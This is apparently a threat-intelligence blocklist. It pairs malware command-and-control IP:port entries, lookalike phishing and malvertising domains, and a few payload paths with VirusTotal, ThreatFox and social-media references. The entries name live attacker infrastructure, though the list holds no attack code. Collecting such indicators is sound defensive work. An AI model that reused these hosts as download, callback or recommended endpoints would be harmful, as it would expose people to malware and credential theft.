193.149.129.136:55556

# Reference: https://x.com/suyog41/status/1915373432574775499
# Reference: https://x.com/malwrhunterteam/status/1915382237236785464
# Reference: https://www.virustotal.com/gui/file/3c9d179d6c8061fb921285c59259e53129f7dcd6c02a685276908d28504c8a8c/detection
# Reference: https://www.virustotal.com/gui/file/8beba833da758b47c77e62269bba3624a16b33f7f8b791d6a5343c819b5c7075/detection

http://65.38.120.193
/PaloNetwork/Files/JL01.html
/PaloNetwork/Files/FG03.html
/PaloNetwork/Files/iloveyou.png

# Reference: https://twitter.com/drb_ra/status/1721707992142282792
# Reference: https://www.virustotal.com/gui/file/f232292c5a5be9cca042b6a204b3eac6e2b47de5683376eb9dca3a4283c38417/detection
# Reference: https://www.virustotal.com/gui/file/f1919abe7364f64c75a26cff78c3fcc42e5835685301da26b6f73a6029912072/detection
# Reference: https://www.virustotal.com/gui/file/ebd54bda4cc2adc94cc987a6a6e0e381aed0e3b35242bb283c9431117e9f1d9f/detection
# Reference: https://www.virustotal.com/gui/file/ac65fc0b341293796fba4e6b060ea3b2784456a0c3414ca5818726b42246d1a7/detection

aqlifecare.com
health.aqlifecare.com

# Reference: https://twitter.com/drb_ra/status/1721895020880712100
# Reference: https://www.virustotal.com/gui/file/208c395d7cba4adf69df4f95fd9c874ff52ffab14df525e50d1255d3d950f2ab/detection
# Reference: https://www.virustotal.com/gui/file/52b58ee6ebe69ee13fe970a68eda09118aa83d5a669b79090f6a880fd9d344d8/detection

viewservice.org/usersync/tradedesk/

# Reference: https://threatfox.abuse.ch/ioc/1199587/

132.145.106.12:443

# Reference: https://twitter.com/1ZRR4H/status/1722515857832559066
# Reference: https://www.virustotal.com/gui/file/4ff71b3f881dbf6692adf9fe686da6acfe8190a53d2b0afca3815b2d4903f019/detection

http://80.92.206.203
80.92.206.203:443

# Reference: https://www.virustotal.com/gui/file/85239a43c106a44aac81c772f87982848cf18bcce87b5c0b5c4f1b1ea17c8b66/detection

cloudfare.webredirect.org

# Reference: https://twitter.com/ScumBots/status/1722878084913693164
# Reference: https://www.virustotal.com/gui/file/a4fafa40bfe7001d890c256f6c4456a63ba16165f37ce7763a18ae4d48ffcba2/detection

18.177.76.42:19536

# Reference: https://twitter.com/ScumBots/status/1722988815965409392
# Reference: https://www.virustotal.com/gui/file/3e2c2052e4854730e5de9f445426030f03c80ea3d031eb89b23b6cdd65a55b9d/detection

18.177.60.68:18056

# Reference: https://threatfox.abuse.ch/ioc/1201542/

79.143.181.62:443

# Reference: https://twitter.com/ScumBots/status/1723308424081907796
# Reference: https://www.virustotal.com/gui/file/573e2765776dbe271ef7feefa7502d7a758178f067c595ea9908e2df2ae9abb0/detection

18.177.0.235:18072

# Reference: https://twitter.com/doc_guard/status/1725564939878756608
# Reference: https://www.virustotal.com/gui/file/33d3af4cae982d5f0456f3b13d5dcf90506c0262e2900d4ef32a4e01a59628bc/detection
# Reference: https://www.virustotal.com/gui/file/92343dd76241c60af94b8ccd1d841539dce75f61baf0c8f7eb655244e7c74f5d/detection
# Reference: https://www.virustotal.com/gui/file/96c62314d9fe9d18efb86551ac411d17de0e9ecda19654355da9b5e80ef91cf0/detection

45.94.171.145:65001
rootsomer.com.tr

# Reference: https://twitter.com/malwrhunterteam/status/1726684924189778027
# Reference: https://www.virustotal.com/gui/file/51d58c202db91bf0cdb3fd5008dcec32e098d6ce11d8bfe60eeb48f52b9881d9/detection

89.23.96.127:7777
drive-cloud.site
google.drive-cloud.site

# Reference: https://www.virustotal.com/gui/file/17e224b87896058d524b045a1f381cdef5706e39269a241ff66ce182a236a8e1/detection

growens.it

# Reference: https://www.virustotal.com/gui/file/ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44/detection

adobe-us-updatefiles.digital

# Reference: https://twitter.com/ScumBots/status/1729243782003007627
# Reference: https://www.virustotal.com/gui/file/f8d9c76db48bcacc9d1d6eebd448fe64840a22ca02b4adf038369de0ab1c0854/detection

69.69.69.69:9032

# Reference: https://twitter.com/ScumBots/status/1730067964680958059
# Reference: https://www.virustotal.com/gui/file/701bf64997d99ecd5746a74490b91907ae7a2932a1328e8f8153060b5517f201/detection

18.177.76.42:16408

# Reference: https://twitter.com/ScumBots/status/1730062930895372548
# Reference: https://www.virustotal.com/gui/file/ef7fdc6dce3cd02b4723a02076161a2db53c8d3872d87c01b90c3a4493822044/detection

18.176.183.3:16499

# Reference: https://twitter.com/ScumBots/status/1730005048715846083
# Reference: https://www.virustotal.com/gui/file/672f42064edaf777423c28564d4699ba6d3a8ce7be6d2a077bfb2c56033d2738/detection

18.177.53.48:10233

# Reference: https://twitter.com/ScumBots/status/1730002531143602423
# Reference: https://www.virustotal.com/gui/file/2a7876be11ba9711d3c40dc32d0a682ab5d9f5f97a1e48800ff0e071c4494418/detection

18.177.0.235:18650

# Reference: https://twitter.com/ScumBots/status/1729855312239186318
# Reference: https://www.virustotal.com/gui/file/d7f55aee386b92996121a3db058a99ebcb36c8beb102ec97a84a0861f0ed668b/detection

185.198.56.73:10443

# Reference: https://twitter.com/ScumBots/status/1729786117203931283
# Reference: https://www.virustotal.com/gui/file/9085492cb286de93e5827917b70ff0766d2428b6f7fc3048f832a21fb48d0c0b/detection

18.177.0.235:18224

# Reference: https://twitter.com/ScumBots/status/1729783590202867719
# Reference: https://www.virustotal.com/gui/file/0d386a97d8bb9b552ec6f5b846e5d5782e8e1961d6b5f20ecfbe0c6f1ce4f692/detection

18.177.0.235:19610

# Reference: https://twitter.com/ScumBots/status/1728486288553087217
# Reference: https://www.virustotal.com/gui/file/0a5b954528f496eba1fbfb342beb2f6fba414eb65fb4080a25e6076dd8f81f7a/detection

147.185.221.17:28648

# Reference: https://twitter.com/ScumBots/status/1727526214837948878
# Reference: https://www.virustotal.com/gui/file/1f66f988f842c0b1d50d7988354ddaaaf7df2d171b8407f12fae111db7a19a62/detection

18.177.60.68:16672

# Reference: https://twitter.com/ScumBots/status/1727523700713336901
# Reference: https://www.virustotal.com/gui/file/ca78da048be50d57af074b9348150606c11564a087f8b15eb273a4c853a6557c/detection

18.177.76.42:17168

# Reference: https://twitter.com/ScumBots/status/1727518668345532521
# Reference: https://www.virustotal.com/gui/file/ddde2b7bf9b8272efc367ff0a32f9195b38f81c103c64d1773994236f41aa861/detection

18.176.183.3:13608

# Reference: https://twitter.com/ScumBots/status/1725412296111911402
# Reference: https://www.virustotal.com/gui/file/85cb3767b22a0fe7280519d30663972557ccd681738baa855f70daf767dc6d42/detection

18.177.76.42:18064

# Reference: https://twitter.com/ScumBots/status/1724780625121714349
# Reference: https://www.virustotal.com/gui/file/404c3ce096f6991834caeae8a5969f52b73b796c5ac7896875f069b708f8032b/detection

18.176.183.3:16992

# Reference: https://twitter.com/ScumBots/status/1724418231362822592
# Reference: https://www.virustotal.com/gui/file/0259975a0674bd03f1293281ee6d4b01be43929f3d505b3f8d243332ab3b1cca/detection

18.177.76.42:12625

# Reference: https://twitter.com/ScumBots/status/1724408165658243082
# Reference: https://www.virustotal.com/gui/file/7ac271b284c02f95bf6333c1de26f494eb6b780ce09d2c704afa3cdb112f7528/detection

18.176.183.3:16208

# Reference: https://twitter.com/ScumBots/status/1724078495829991483
# Reference: https://www.virustotal.com/gui/file/f8bd60ec9c3262f9df306c0aacc83c5e3e78665a49e1b2e8d1bcbf9169a1f700/detection

18.177.0.235:15888

# Reference: https://twitter.com/ScumBots/status/1724008034785952116
# Reference: https://www.virustotal.com/gui/file/f5d21d57cbc53dccee84e7bb701c3070661d0cbd39ff352b660df2846f126c72/detection

18.177.60.68:12816

# Reference: https://twitter.com/ScumBots/status/1724005519151485194
# Reference: https://www.virustotal.com/gui/file/51dbd2d4dd796949b14afc81aeb78fd1c712b068e101b9ad1572d6e770491806/detection

18.177.0.235:19410

# Reference: https://twitter.com/ScumBots/status/1723947633100628349
# Reference: https://www.virustotal.com/gui/file/22c1329be33647af3519c6ecac6f934b1bedfad2266f23ba34e5c81817ea4d59/detection

18.177.60.68:12641

# Reference: https://twitter.com/ScumBots/status/1723945125082964066
# Reference: https://www.virustotal.com/gui/file/24f8581f8da73997f9fdf1d19a4da0140fd85fb684f6d657e2d0547320489722/detection

18.177.76.42:18744

# Reference: https://twitter.com/ScumBots/status/1723942676880318551
# Reference: https://www.virustotal.com/gui/file/cdaa6ce98344ce69b6c93bee366ec1a746d672aacf9d14df4af326a6d536d0c3/detection

18.176.183.3:12601

# Reference: https://twitter.com/ScumBots/status/1723942599138939269
# Reference: https://www.virustotal.com/gui/file/040fe52ae08209acdec3c0856d79ad53bb89d45f42837cf64bcc1bd9af9e5fc1/detection

18.177.76.42:10528

# Reference: https://twitter.com/ScumBots/status/1723937565940523176
# Reference: https://www.virustotal.com/gui/file/8b6b6dd7e953ef8d730f7a33cdf56ba0dd2b02097c89310287d25333a7f0b2f7/detection

18.176.183.3:13833

# Reference: https://twitter.com/ScumBots/status/1723935058027843806
# Reference: https://www.virustotal.com/gui/file/f75e602c31a8fc107f944cac6d30d2711c1d4f5ffb8645a9e387a3ff6340fcd4/detection

18.177.53.48:13833

# Reference: https://twitter.com/ScumBots/status/1723310946230128775
# Reference: https://www.virustotal.com/gui/file/80834896d6c0dd7a61c3d5f89ddea06e793184077b6ee4a70168d51fca54fb1f/detection

18.177.0.235:19193

# Reference: https://twitter.com/ScumBots/status/1723308424081907796
# Reference: https://www.virustotal.com/gui/file/573e2765776dbe271ef7feefa7502d7a758178f067c595ea9908e2df2ae9abb0/detection

18.177.0.235:18072

# Reference: https://twitter.com/ScumBots/status/1723298436395540941
# Reference: https://www.virustotal.com/gui/file/11d03bb5069bb781567169aa37b8da61e731a9753447344f4ce5cb731017b5b3/detection

18.177.76.42:14706

# Reference: https://twitter.com/ScumBots/status/1723298359253864618
# Reference: https://www.virustotal.com/gui/file/17b1db76f845ac1236a13a0e81b07c6f81b8bcf54d79056008768b521e0d9eca/detection

18.177.76.42:19464

# Reference: https://twitter.com/ScumBots/status/1723293319004926397
# Reference: https://www.virustotal.com/gui/file/a332d9a03fc5f058bbe43920c63a82343f4968584fd3de95247b422658bd2518/detection

18.177.60.68:11625

# Reference: https://twitter.com/ScumBots/status/1723190139885642115
# Reference: https://www.virustotal.com/gui/file/37f9b9194773dcfd0661a084d43d806aa7889724bb8828de7ebd100397877911/detection

18.177.53.48:17984

# Reference: https://twitter.com/ScumBots/status/1723187627598193086
# Reference: https://www.virustotal.com/gui/file/054d994f7c6575ceb31aacc8380898277205861e99b49462752b1750c3cd9a26/detection

18.176.183.3:12209

# Reference: https://twitter.com/ScumBots/status/1723185112961954128
# Reference: https://www.virustotal.com/gui/file/7993994480e859b0c8a6260089c144fac5daaff6249a68094958f981328fdb31/detection

18.177.0.235:14922

# Reference: https://twitter.com/ScumBots/status/1722996370481512623
# Reference: https://www.virustotal.com/gui/file/399f0d3ef13f91a2ee84d27d8f2ea6662a77f62447f607122dac5efed13797c3/detection

18.177.53.48:11440

# Reference: https://twitter.com/ScumBots/status/1722994015358824650
# Reference: https://www.virustotal.com/gui/file/28c9d3eb510a2d423951ebc0f3aafc804fed15f8680da0513a06f677742aec75/detection

18.176.183.3:10122

# Reference: https://twitter.com/ScumBots/status/1722993929631441381
# Reference: https://www.virustotal.com/gui/file/79792001fd78cfb7d07746926ec9eefbd6629ab669c685e4d55d2380034f59a0/detection

18.177.60.68:11867

# Reference: https://twitter.com/ScumBots/status/1722993849792864518
# Reference: https://www.virustotal.com/gui/file/ef21228079382941b59c91068b715a80a6f49d4d822c3f332658cafd052d68f3/detection

18.177.60.68:11385

# Reference: https://twitter.com/ScumBots/status/1722991407143469058
# Reference: https://www.virustotal.com/gui/file/6bcf5cbe50239b2787bf97843ecdc7a6fc816d71e70630b0bd6f0a0f21db6e65/detection
# Reference: https://www.virustotal.com/gui/file/332ccdc1968fc98802a85ba05013a2c699a7382b72b9d9f08334b910203e3af2/detection

18.177.0.235:13721

# Reference: https://twitter.com/ScumBots/status/1722986456845590690
# Reference: https://www.virustotal.com/gui/file/9c59ec234bea2a43db1ef08f405b519f31d88dd90bb3bcad04150cfb6ac05eac/detection
# Reference: https://www.virustotal.com/gui/file/5c726429d44b966bea1464470dd66b3a24d3e824a5e7652edbce20bf69673d4e/detection

18.177.76.42:12819

# Reference: https://twitter.com/ScumBots/status/1722986378139431243
# Reference: https://www.virustotal.com/gui/file/54033f0f9f507ae3d5773696000bdd3e63f5da1cec2794504700339446134169/detection

18.177.53.48:18056

# Reference: https://twitter.com/ScumBots/status/1722968685369856086
# Reference: https://www.virustotal.com/gui/file/1393b94f6048c81c78642a75dee59081d6800673bb97895f06419c2bf5f41d89/detection

18.177.76.42:12433

# Reference: https://twitter.com/ScumBots/status/1722961348877856916
# Reference: https://www.virustotal.com/gui/file/051fdadbc6f1cf9488a8d9abf15971216541c70110a75198bab0622dfa0af293/detection

18.177.76.42:16321

# Reference: https://twitter.com/ScumBots/status/1722958621032472836
# Reference: https://www.virustotal.com/gui/file/41f968891129a281f8570aca44a8001a29c560937aec8b80cbb60f576a4600a7/detection

18.177.53.48:15584

# Reference: https://twitter.com/ScumBots/status/1722895698817855941
# Reference: https://www.virustotal.com/gui/file/bb732f7511c559012473fbbdb286e5cc84b9a73b10a0eefd6611d51bd712b331/detection

18.177.60.68:12872

# Reference: https://twitter.com/ScumBots/status/1722878084913693164
# Reference: https://www.virustotal.com/gui/file/a4fafa40bfe7001d890c256f6c4456a63ba16165f37ce7763a18ae4d48ffcba2/detection

18.177.76.42:19536

# Reference: https://www.virustotal.com/gui/file/f8127f7205bbbdfa3f40a4c009703641c0ed09cf89aa6ce5510524feccaa8726/detection
# Reference: https://www.virustotal.com/gui/file/89e6f33824e88d57cda8be418ff52e814fb29cd39ac5f825eae2a024cb6ef700/detection

185.81.157.149:2023
france8292.nerdpol.ovh

# Reference: https://twitter.com/karol_paciorek/status/1730544154113913108

65.0.50.125:22355

# Reference: https://www.virustotal.com/gui/ip-address/3.93.178.75/detection

http://3.93.178.75

# Reference: https://twitter.com/ScumBots/status/1731740236240015801
# Reference: https://www.virustotal.com/gui/file/93bf4be640c337f290ba1fdf264d56bc3213738219d5ab63d0f0a8cac9630d04/detection

138.2.157.219:443

# Reference: https://twitter.com/alex_lanstein/status/1732868035843645723
# Reference: https://www.virustotal.com/gui/file/bb09b5b26c1c74cf828eec82048ae6271724f61007dd853a3ba705b6dde04337/detection

122.228.116.67:8080

# Reference: https://twitter.com/drb_ra/status/1732758759754141753

d11zd6hrtvyf1p.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/4c34df2f7423f7b7bf7440e051035c1e5d9db272c741d629141324491b0d4d5d/detection

3.126.37.18:14362

# Reference: https://twitter.com/ScumBots/status/1735535234664308787
# Reference: https://www.virustotal.com/gui/file/44c7c3e0dfb28cab1ef535f8a53dba0e5488e7b5239a144006fbd25a5e6c01ca/detection

18.136.148.247:15343
18.139.9.214:15343

# Reference: https://twitter.com/ScumBots/status/1735532726797672915
# Reference: https://www.virustotal.com/gui/file/3b657c49664960ef41e9db981923cad7e73bafa1d87f93d1789409d7f58539b7/detection

18.136.148.247:16423

# Reference: https://www.virustotal.com/gui/file/86086bc19dd4e1316fe6dee93454f4808fcb7e2ba3948097dc48f01cf2b10c5e/detection

115.50.30.228:33238
115.63.183.62:58957
117.252.168.65:36030
222.137.83.24:39926

# Reference: https://www.virustotal.com/gui/file/762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378/detection

196.196.156.2:49210
196.196.156.2:57881

# Reference: https://twitter.com/Cuser07/status/1740659266900611531
# Reference: https://www.virustotal.com/gui/file/8edfc87e63a2800702665a5c8d5d7b7d5cd549febcdacf8a22bd391c851a45ec/detection

d1ebpf5ahsunvt.cloudfront.net

# Reference: https://threatfox.abuse.ch/browse/malware/win.poshc2/ (# 2024-01-03)

http://13.48.77.144
http://173.249.26.59
139.84.172.20:443
161.35.21.152:443
173.249.26.59:443
35.80.38.180:443
35.80.38.180:8443
65.20.68.219:443
d328.net

# Reference: https://tria.ge/231230-q2rawaebc3/behavioral1

steam-install.run

# Reference: https://twitter.com/ScumBots/status/1740670327271653589
# Reference: https://www.virustotal.com/gui/file/317152256190ca37a0fa1ce2c1807024c98a3267ef1eb6842a7a2a09833e2062/detection

35.239.127.10:443

# Reference: https://twitter.com/ScumBots/status/1743064852963144055
# Reference: https://www.virustotal.com/gui/file/b7f4dcdb365b9a74324ccb0e750e8181500268e7f413973e1b873ceda159a509/detection

193.161.193.99:64773

# Reference: https://www.virustotal.com/gui/file/fcd6f5506ed12295692c7c1e5b8c4104aa379ac37d1034374ba9c3e3328e3914/detection

85.209.11.36:26670
2610asdkj.site
bchbonus.com

# Reference: https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube

176.113.115.224:29983
176.113.115.226:29983
176.113.115.227:29983
176.113.115.229:29983
176.113.115.232:29983

# Reference: https://twitter.com/ScumBots/status/1744771096124039618
# Reference: https://www.virustotal.com/gui/file/e7b3bb4a61a12b8c4ce7d0f4ab6f7fd899883a871d4d426de076f87b3392bcc6/detection

79.113.4.99:8081

# Reference: https://twitter.com/ScumBots/status/1744839048693162495
# Reference: https://www.virustotal.com/gui/file/a242aeb820185122af76bac0689167116dc5077172ba71cb92459c70d4233fcd/detection

193.161.193.99:61800

# Reference: https://twitter.com/sicehice/status/1745307281267294342
# Reference: https://www.virustotal.com/gui/file/bf50b3d9d11c1fe5d56c3a9152f37f141ed00b43813bdf267b2cbf605257f8f7/detection

52.57.79.63:4444
/powershell-backdoor-generator-main/

# Reference: https://twitter.com/drb_ra/status/1746166747332301039

3.120.209.174:443

# Reference: https://twitter.com/ScumBots/status/1746588069258575897
# Reference: https://www.virustotal.com/gui/file/fa18091c3f994270dfd753f791351b1efe8058520fec8059aaf1981ad952c26d/detection

3.6.115.64:90001

# Reference: https://twitter.com/0xBurgers/status/1661279651157737472
# Reference: https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising

advanced-ip-scanner.net
advanced-ip-scanners.net
wtf-system-4758995.workers.dev
wtf-system-4759011.workers.dev
cdn-software.workers.dev
extended-system.workers.dev
cdn-cloude.extended-system.workers.dev
cdn-us-tech.wtf-system-4758995.workers.dev
cdn-us-tech.wtf-system-4759011.workers.dev
us.cdn-software.workers.dev

# Reference: https://twitter.com/drb_ra/status/1746896061325582823

wrk5.eastus.cloudapp.azure.com

# Reference: https://www.virustotal.com/gui/file/d35648979ad90bdd1f27896dd66d77e9972a6b5b86d3ae88c556dd7bbafbd7fa/detection

163.5.64.98:58003
91.92.254.174:5800
91.92.254.174:58001
91.92.254.174:58002
91.92.254.174:58003
blue.o7lab.me

# Reference: https://twitter.com/drb_ra/status/1750335823524893138

165.227.246.129:443

# Reference: https://twitter.com/ScumBots/status/1753921394436415944
# Reference: https://www.virustotal.com/gui/file/8afcb016e39b5494802e39839ffbc469896525980214fc5f22ec49d19defb636/detection

45.128.232.34:9001

# Reference: https://twitter.com/ScumBots/status/1754356754173849915
# Reference: https://www.virustotal.com/gui/file/ce6cb6551226f51abde1475e1a0485cad9494a19d35424dd199c220e3ddd129a/detection

34.139.44.168:8000

# Reference: https://twitter.com/Joseliyo_Jstnk/status/1754830872031744020
# Reference: https://www.virustotal.com/gui/file/3761fb4c5b30d06501fe6688019ace6c899bdfc278049ddd91b96e0efe0d8830/detection
# Reference: https://www.virustotal.com/gui/file/b9c763ed1cd4cabc6faa0fece7738a941de1d65163d05480c9790217d931c7c8/detection

46.101.126.207:443
46.101.126.207:8080

# Reference: https://twitter.com/ScumBots/status/1754975840197120088
# Reference: https://www.virustotal.com/gui/file/aebb2b7cd7fc664e0bf3ff878d7058986b047159b4f9f9004ba45f1837c5f2a7/detection

194.21.3.8:1337

# Reference: https://www.virustotal.com/gui/file/cfa40f0fec496888a22ddf61803cc9ddfdabf06d85d4fedf7efbed59d29b9eea/detection

194.5.98.235:5900

# Reference: https://twitter.com/karol_paciorek/status/1757353098035511512
# Reference: https://www.virustotal.com/gui/file/609a919f7f20b2099e0e283f46b768f749d8c9a7998a539bc4d29b56fb74373f/detection

http://144.76.219.54
144.76.219.54:8081

# Reference: https://twitter.com/Purp1eW0lf/status/1758825322399625545

185.147.213.194:443

# Reference: https://twitter.com/ScumBots/status/1761372989214298223
# Reference: https://www.virustotal.com/gui/file/5e04174a8cba880cce9d6d7d4073e7402f6855eb4adb0b47f5f73da86e212d15/detection

130.61.108.56:25575

# Reference: https://twitter.com/ScumBots/status/1767541137768697951
# Reference: https://www.virustotal.com/gui/file/619148d288215955662b7019384c6fefb5bd4d96fecb80368a7b6de23736dc08/detection

13.37.87.194:7007

# Reference: https://twitter.com/ScumBots/status/1767563807293931542
# Reference: https://www.virustotal.com/gui/file/017292ffa323ca3deb8a1c0a6ba2f32ed2fd2ec75eed5a22f8fbc096880fc944/detection

13.37.87.194:443

# Reference: https://www.virustotal.com/gui/file/7072297b018300c0f1d432ac4a7e98ebca34c9377215a55b1fd186551fd6b2e9/detection
# Reference: https://www.virustotal.com/gui/file/e1f0d4706f5c9aae0902b278c423f3cb135180ecd69f43d47111a06f1e647e91/detection

18.177.53.48:15486

# Reference: https://www.virustotal.com/gui/file/74aee342201d218a640fcc57974cb713e23ca05e6e74111c35bb797de7390028/detection

18.176.183.3:14849

# Reference: https://www.virustotal.com/gui/file/97103a38ca96751430190a2c14bda371fa1753b6ac8c904c3783b151fbafadab/detection

18.176.183.3:19517

# Reference: https://www.virustotal.com/gui/file/15cb5d2170a131a4c402dbd2a8a5d5b5996709b2b5ebdf03e4b6350096fac7dc/detection

18.176.183.3:13584

# Reference: https://www.virustotal.com/gui/file/f00fdb2a462b1ee5bce21181ee2e8f7beb6a17b7ebdcfeae1d7669ec886c1627/detection

18.176.183.3:15502

# Reference: https://www.virustotal.com/gui/file/4f6e8de8f57b96d6342121d01a67a803ba88015de8283122245c5e3a6f4efe0d/detection

18.177.60.68:15302

# Reference: https://www.virustotal.com/gui/file/380a561a3e8d488489f101560830ecdf309851bbd9ad45f92a09121cdb2fd568/detection

165.227.224.60:8080

# Reference: https://www.virustotal.com/gui/file/55cd6b23ce8586bde06e974745a025c9f6595415c71a3595bf217a7ccc7554a3/detection

85.245.250.108:8080

# Reference: https://www.virustotal.com/gui/file/160540c6f26752264bd90cae32ead977868637d9afac14d9726972fc49b86b8b/detection

3.6.115.64:19833
3.6.30.85:19833

# Reference: https://www.virustotal.com/gui/file/d3f02563e38094e0216ddb73b215b5d9ce99011c43a3211f450c153df93c99ea/detection

185.117.118.21:49769

# Reference: https://www.virustotal.com/gui/file/1b0b6d51d6ea22574c9252ec096477a78e1f2ef10e92cae027292f4418c885b9/detection

18.177.60.68:17489

# Reference: https://www.virustotal.com/gui/file/60694a0680edba3640008ae16bf7f521fe91b93c1a2c440657b6d86c0ec7c00f/detection

18.176.183.3:13450

# Reference: https://www.virustotal.com/gui/file/9119d51da2a9ff70b77834056723b1791f0d2f09a5eee499a683681270eff8e8/detection

18.176.183.3:13433

# Reference: https://www.virustotal.com/gui/file/d1df44a5213dda2704c92779cbea83964d5aa8686e03884cd722201ea3ce33cb/detection

18.176.183.3:13745

# Reference: https://www.virustotal.com/gui/file/4a825aec2c8f92ac8802adcba44991ba7ad1d4912c9a453f32d6d09cc08e4bb4/detection
# Reference: https://www.virustotal.com/gui/file/1d0e66c92b3cbde06ee14aa910ed51647a60d33459f7f81873fbfd09df29529a/detection
# Reference: https://www.virustotal.com/gui/file/3b838c2761af6a8b49c7460d3ed835a23441ed4d6e3a037c9c5d2ffa31693c54/detection

18.156.13.209:11592
18.157.68.73:11592
18.197.239.5:11592
3.127.138.57:11592

# Reference: https://www.virustotal.com/gui/file/300c58f06ba356a509afeb048354143fd9172e676eb1307b6a7a7f338f199e01/detection

165.227.224.60:8080

# Reference: https://www.virustotal.com/gui/file/a303a8a831b577dca4a1188fbe257c348fe73102a3aa43d2e60243b61ad63ef8/detection

http://15.161.126.107

# Reference: https://www.virustotal.com/gui/file/2f6fa0b9f9997e0b5ae31f85c56c6ecf583a33990ad8fae3148f706b57d69514/detection

194.213.3.8:9555

# Reference: https://www.virustotal.com/gui/file/52f4b9da3052bd5bf99bc87bc9d9eb5f94ce65ab89198c5408daa3d17ab7c4af/detection

18.176.183.3:18619

# Reference: https://www.virustotal.com/gui/file/39d5ec5af27ce18da21501d59d72063bbae2f7886a9da17cac4aa9f496f1dde8/detection

18.177.60.68:16180

# Reference: https://www.virustotal.com/gui/file/4c464611b5ab88d75a4a573cf864776deb293aa2a8fc3c1c5fb17adab6cca8e7/detection

18.177.0.235:12545

# Reference: https://www.virustotal.com/gui/file/fde50d772933f871c8e67d7f2c44981b8740593f9dd5a12ef6fbe52f2f531492/detection

18.176.183.3:14612

# Reference: https://www.virustotal.com/gui/file/4377e4584c8fdfba307ac4f61b6a3ae0e93fb1708ebfc6d1723a53e8fe500941/detection

18.176.183.3:14084

# Reference: https://twitter.com/IronNetTR/status/1767991130652626995

http://185.65.202.192

# Reference: https://twitter.com/IronNetTR/status/1767991209065115925

206.166.251.44:8080

# Reference: https://twitter.com/ScumBots/status/1770559127304999047
# Reference: https://www.virustotal.com/gui/file/a9989f854fdee68ad82862be83757397bc3131e77aedcf078d31fc3ba3ece04d/detection

85.214.121.47:8080

# Reference: https://twitter.com/ScumBots/status/1772590664611459077
# Reference: https://www.virustotal.com/gui/file/ae51983d406eab5d3474be806f9f057e1a6388e02677b469977464e544f18b4c/detection

18.177.0.235:13209

# Reference: https://twitter.com/ScumBots/status/1772573040276078807
# Reference: https://www.virustotal.com/gui/file/ea9d8cbb0eaaed3fab23b069aec0ee9ac6e0fe3a6a57cbe7def486a736ac0ad5/detection

18.177.0.235:14441

# Reference: https://twitter.com/ScumBots/status/1772588140881907728
# Reference: https://www.virustotal.com/gui/file/9561282d29829885243a5bf6a5f7b5a0e3d9c4187f281a9b400c7c26cc438d95/detection

18.177.53.48:18003

# Reference: https://twitter.com/pmelson/status/1773705034892472694
# Reference: https://www.virustotal.com/gui/file/34aa011f2db60d320f9286b3f5688fe9d75473cc388e34098bed69b464c11579/detection
# Reference: https://www.virustotal.com/gui/file/039832b2b7acb64ccd9385e8e2fd7a1763d2bf0ec107d61d80c48f9241b4cb6f/detection

http://52.196.119.113

# Reference: https://www.virustotal.com/gui/file/7a46b0f4cad3859514ba19e1954a957b905e69dbd52ca7f0cd9ced44e5826f1a/detection

18.177.76.42:15494

# Reference: https://twitter.com/1ZRR4H/status/1775560879158731261
# Reference: https://www.virustotal.com/gui/file/f3821c10dba9a35fe7481cab6dc612dca66378b91037b859e5e2252321ba3ed3/detection
# Reference: https://www.virustotal.com/gui/file/7d432fbc93fb201322c6a1e1cf8d7753c5d036650aa69366205dbbb58ef06cc0/detection

http://185.236.228.29
185.236.228.29:8443

# Reference: https://twitter.com/IronNetTR/status/1777393539044757842

118.25.142.205:1337
118.25.142.205:8080

# Reference: https://twitter.com/crep1x/status/1777957087521202185
# Reference: https://www.virustotal.com/gui/ip-address/82.221.129.44/relations

advanced-ip-scann.org

# Reference: https://twitter.com/ScumBots/status/1778460591692120277
# Reference: https://www.virustotal.com/gui/file/79b6cf9670250fdadb03949552e3d73d17640b1df04ad11b6af3b2d74f2c9ba7/detection

180.184.171.155:4004

# Reference: https://twitter.com/drb_ra/status/1779870354992705630

149.28.232.182:443

# Reference: https://twitter.com/IronNetTR/status/1779989608710701261

http://23.133.88.248
62.67.52.141:8000

# Reference: https://www.virustotal.com/gui/file/dc6c7fc7353f8204e52c6e346b44ee2da18e562ef74ff77fe57f4993a52eb4ec/detection

18.141.129.246:16038
52.220.121.212:16038

# Reference: https://www.virustotal.com/gui/file/4f956c0d67e34145bdb0f7241e2c4d012e147843935d3df1eefd80c7f97524de/detection

13.229.3.203:19151
52.220.121.212:19151

# Reference: https://www.virustotal.com/gui/file/2dc64d70cd121ba2158431cf2c4379e88a8d9e96c8db6d2d4573bd0dacb712de/detection

144.76.71.93:111
powershellcmd.theworkpc.com

# Reference: https://twitter.com/ScumBots/status/1790656008173350936
# Reference: https://www.virustotal.com/gui/file/0b257b2ab2f9f1004f7a145b34dfe1376ef272f644adc0312ff7c3cf9ad0b3d6/detection

172.217.169.195:443

# Reference: https://twitter.com/ScumBots/status/1790827071721046438
# Reference: https://www.virustotal.com/gui/file/b7e39546b815a2128615a0f773928bd1655320956e9ed2494f8f5439cd836632/detection

18.228.115.60:10955
54.94.248.37:10955

# Reference: https://twitter.com/ScumBots/status/1790819532535214303
# Reference: https://www.virustotal.com/gui/file/2cb36e7f0db958d2f54d7db41314f394c3b4fa4f6fd4f4b442506725811ebe17/detection

3.13.191.225:16598
3.134.125.175:16598

# Reference: https://x.com/NDA0E/status/1793631858405818663
# Reference: https://pastebin.com/raw/6PTTM4MD

http://20.163.176.155
20.163.176.155:443
powershell.skype-api.co.uk

# Reference: https://x.com/ScumBots/status/1799582256777826469
# Reference: https://www.virustotal.com/gui/file/123b8d0fea7b632f597898db9f6e3795a7aa5352b7e23ff13544fb82a8fe1cd0/detection

18.228.115.60:15559
54.94.248.37:15559

# Reference: https://x.com/ScumBots/status/1799587290064322567
# Reference: https://www.virustotal.com/gui/file/fe1dd78574699a0cbd9178866f2eec401d3f931218d8cbf73ac7d94daebd87fd/detection

18.228.115.60:11160
54.94.248.37:11160

# Reference: https://x.com/ScumBots/status/1799617488180691059
# Reference: https://www.virustotal.com/gui/file/196ba4c3caecb1d450771c2582a9dd02a87bceee907a8ea0dc7cd57695cbd965/detection

18.229.146.63:10164

# Reference: https://x.com/ScumBots/status/1799657759333372393
# Reference: https://www.virustotal.com/gui/file/2ff4753d7b38f46bc7b8d32ac1f0ad0a5edbbc815fffb2426856acfb24e34a62/detection

3.13.191.225:10406
3.22.30.40:10406

